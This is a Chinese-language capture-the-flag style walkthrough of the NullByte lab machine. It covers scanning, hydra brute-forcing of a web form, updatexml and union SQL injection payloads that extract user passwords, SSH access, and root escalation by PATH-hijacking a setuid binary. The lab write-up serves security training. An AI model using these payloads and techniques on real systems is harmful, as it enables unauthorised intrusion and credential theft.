【OSCP】NullByte靶机渗透-sql注入-权限利用

admin 2025年3月18日21:19:59评论9 views字数 2086阅读6分57秒阅读模式
 

一、靶机搭建

选择扫描虚拟机

【OSCP】NullByte靶机渗透-sql注入-权限利用

选择路径即可

【OSCP】NullByte靶机渗透-sql注入-权限利用

二、信息收集

官方信息

Name: NullByte: 1
发布日期: 2015 年 8 月 1 日
作者: ly0n
目标:访问/root/proof.txt并按照说明操作。
级别:基础到中级。
提示:运用你的横向思维能力,也许你需要写一些代码。

扫ip

靶机ip:192.168.108.157

【OSCP】NullByte靶机渗透-sql注入-权限利用

扫开放服务和端口

开放了80,111,777端口

【OSCP】NullByte靶机渗透-sql注入-权限利用

指纹探测

nmap 192.168.108.157 -p 80,111,777 -sV -sC -O --version-all 

可以发现以下信息,这里注意一下777端口是使用的ssh协议,可能是22端口替换为了777端口

【OSCP】NullByte靶机渗透-sql注入-权限利用

看一下这两个端口的作用

【OSCP】NullByte靶机渗透-sql注入-权限利用

目录扫描

dirsearch扫描

【OSCP】NullByte靶机渗透-sql注入-权限利用

dirb扫描

【OSCP】NullByte靶机渗透-sql注入-权限利用

信息如下

http://192.168.108.157/uploads

http://192.168.108.157/phpmyadmin
http://192.168.108.157/phpmyadmin/index.php
http://192.168.108.157/phpmyadmin/phpinfo.php

三、Web渗透测试

信息收集

只有80端口可以访问,111端口和777端口无法访问

【OSCP】NullByte靶机渗透-sql注入-权限利用

访问uploads目录

【OSCP】NullByte靶机渗透-sql注入-权限利用

访问phpmyadmin

【OSCP】NullByte靶机渗透-sql注入-权限利用

登录抓包查看

【OSCP】NullByte靶机渗透-sql注入-权限利用

没有什么头绪,下载初始界面的图片查看一下

【OSCP】NullByte靶机渗透-sql注入-权限利用

发现一处提示,kzMb5nVYJw,这里无非就是加密的账户密码/路径

【OSCP】NullByte靶机渗透-sql注入-权限利用

作为目录访问一下,成功

【OSCP】NullByte靶机渗透-sql注入-权限利用

在源码发现一处提示,应该是弱口令

【OSCP】NullByte靶机渗透-sql注入-权限利用

抓包发现参数

【OSCP】NullByte靶机渗透-sql注入-权限利用

利用hydra爆破密码,这里用户名随意选择即可,爆破的目标是密码

hydra 192.168.108.157 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l admin -P /usr/share/wordlists/rockyou.txt

拿到密码elite

【OSCP】NullByte靶机渗透-sql注入-权限利用

进去之后是如下界面

【OSCP】NullByte靶机渗透-sql注入-权限利用

随意输入发现回显成功

【OSCP】NullByte靶机渗透-sql注入-权限利用

SQL注入

先抓包看看,有传参点

【OSCP】NullByte靶机渗透-sql注入-权限利用

fuzz一下,存在sql注入

【OSCP】NullByte靶机渗透-sql注入-权限利用

可以判断是字符型注入,而且要么是下面的回显,要么报错,说明是bool注入

【OSCP】NullByte靶机渗透-sql注入-权限利用

注释用**--+**成功

【OSCP】NullByte靶机渗透-sql注入-权限利用

order by判断列数,说明有3列

【OSCP】NullByte靶机渗透-sql注入-权限利用

报错注入

这里使用报错注入,发现可行,数据库:seth

【OSCP】NullByte靶机渗透-sql注入-权限利用

后续代码

updatexml(1,concat(0x7e,(database()),0x7e),1)  #查看当前库,0x7e是’~'十六进制转化的结果,用来分割我们的结果  
updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='seth' limit 0,1),0x7e),1)  #查看seth库下面的第一张表
updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)  #查看users表下面的第一个字段
updatexml(1,concat(0x7e,(select pass from users limit 0,1),0x7e),1)  #查看users表下面的pass字段

查看第一张表,只有该表可以查看

【OSCP】NullByte靶机渗透-sql注入-权限利用

查到第一个字段:id

【OSCP】NullByte靶机渗透-sql注入-权限利用

查到第二个字段user

【OSCP】NullByte靶机渗透-sql注入-权限利用

查到第三个字段pass

【OSCP】NullByte靶机渗透-sql注入-权限利用

查到第四个字段position

【OSCP】NullByte靶机渗透-sql注入-权限利用

查询user字段只查到了两个用户名,ramses  isis

【OSCP】NullByte靶机渗透-sql注入-权限利用

查看pass字段,第一个用户名的密码:YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM

【OSCP】NullByte靶机渗透-sql注入-权限利用

第2个查不出来

【OSCP】NullByte靶机渗透-sql注入-权限利用

利用该账户密码登录登录不上,而且解码格式也不对,可能有问题

【OSCP】NullByte靶机渗透-sql注入-权限利用

union注入

重新试试注入方式,这里不输入字符查看一下,发现可以回显

【OSCP】NullByte靶机渗透-sql注入-权限利用

这里查到了几个数据库名

【OSCP】NullByte靶机渗透-sql注入-权限利用

这里就不多查看了,可以看上面的报错注入

【OSCP】NullByte靶机渗透-sql注入-权限利用

直接查看数据,拿到密码YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

【OSCP】NullByte靶机渗透-sql注入-权限利用

解密一下,得到密码omega

【OSCP】NullByte靶机渗透-sql注入-权限利用

ssh登录

登录mysql,失败

【OSCP】NullByte靶机渗透-sql注入-权限利用

这里发现22端口找不到,用之前的777端口

【OSCP】NullByte靶机渗透-sql注入-权限利用

成功登录

四、提取

信息收集

先找找信息

【OSCP】NullByte靶机渗透-sql注入-权限利用
【OSCP】NullByte靶机渗透-sql注入-权限利用

查看历史命令,发现有个eric用户

【OSCP】NullByte靶机渗透-sql注入-权限利用
【OSCP】NullByte靶机渗透-sql注入-权限利用

先进入根目录查看

【OSCP】NullByte靶机渗透-sql注入-权限利用

查看文件

【OSCP】NullByte靶机渗透-sql注入-权限利用

拿到数据库账户密码,root  sunnvvale

【OSCP】NullByte靶机渗透-sql注入-权限利用

但是登录数据库无效,查看备份文件,这个文件有s权限,可以看到其所有者是root

当一个可执行文件设置了setuid位时,任何用户执行该文件时,程序将以文件所有者的权限运行,而不是执行者的权限
【OSCP】NullByte靶机渗透-sql注入-权限利用

procwatch文件是一个二进制文件,运行一下,还执行了ps查看进程命令和sh命令

【OSCP】NullByte靶机渗透-sql注入-权限利用

二进制文件提取

首先建立软连接

ln -s /bin/sh ps

这样在执行的时候会执行ps命令然后调用shell权限

【OSCP】NullByte靶机渗透-sql注入-权限利用

修改环境变量将当前**目录.**追加到环境变量的最开始

export PATH=.:$PATH
【OSCP】NullByte靶机渗透-sql注入-权限利用

然后执行文件即可拿到权限

【OSCP】NullByte靶机渗透-sql注入-权限利用

成功发现目标文件

原文始发于微信公众号(泷羽Sec-track):【OSCP】NullByte靶机渗透-sql注入-权限利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日21:19:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】NullByte靶机渗透-sql注入-权限利用https://cn-sec.com/archives/3852461.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息